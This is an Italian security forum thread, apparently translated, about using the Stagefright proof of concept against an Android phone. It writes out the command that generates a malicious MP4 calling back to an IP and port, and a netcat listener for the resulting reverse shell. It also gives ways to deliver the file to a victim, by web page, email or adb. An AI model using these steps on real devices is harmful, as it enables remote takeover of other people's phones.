Stagefright su Samsung Galaxy S3 con JB 4.3 [chiuso]

Naviga le tue risposte
2

Ultimamente sto facendo molte ricerche su Stagefright ed è stato confermato che molti modelli di telefono con Android Lollipop e versioni successive sono suscettibili di exploit.

Quindi, dal momento che il mio S3 si è rivelato vulnerabile all'utilizzo che ha utilizzato Zimperium's Stage Detector App Ho deciso di metterlo alla prova.

Ho scaricato il codice stagefright di Joshua Drake ( mp4.py ) e sono riuscito a creare il file MP4 dannoso eseguendo: 

python mp4.py -c 192.168.x.x -p 4444

c per LAN IP

p per il numero di porta

Ora un sacco di tutorial online dicono che prima di inviare il file MP4 tramite MMS al telefono di destinazione, devo impostare una backdoor usando netcat. Tuttavia, ho scoperto che creare una backdoor usando metasploit è molto più efficace per ottenere il pieno controllo del telefono.

Ho sentito che potresti anche incorporare l'MP4 o altri file multimediali in una pagina web in modo tale che quando una vittima visita la pagina web, puoi avere il pieno controllo del telefono nello stesso modo sopra menzionato.

Quindi, come si può ottenere?

    
posta Josephson47 27.02.2017 - 08:14
fonte

2 risposte

2

Devi installare netcat sul tuo PC, non sul dispositivo. Imposta questo netcat in modalità ascolto per la porta scelta: 

nc -lp 4444

Il dispositivo otterrà il suo netcat riproducendo il file video falsificato. Non hai bisogno di MMS per avere il video inviato al telefono. Puoi incorporare il video su una pagina web, inviarlo via email o semplicemente utilizzare adb push comando per memorizzarlo sul dispositivo. Successivamente, usa il riproduttore video standard per riprodurre il video e avrai il controllo del dispositivo dalla riga di comando del PC.

    
risposta data 27.02.2017 - 15:10
fonte
2

Prova il modulo Metasploit: link

Inoltre, dal PoC originale di Josua Drake link

First, it is not a generic exploit. It's only been tested to work on a single device model. My target was the Galaxy Nexus device running Android 4.0.4 containing only a partial implementation of ASLR.

Per usarlo su un altro dispositivo, devi conoscere gli indirizzi delle funzioni libc.so per i gadget a catena ROP.

    
risposta data 27.02.2017 - 20:54
fonte

Leggi altre domande sui tag

Facendo clic su "no" su "Vuoi consentire al seguente programma ... di apportare modifiche a questo computer" significa che sono al sicuro? L'esistenza di una collisione SHA-1 significa che tutte le password con hash con essa non sono sicure? [duplicare]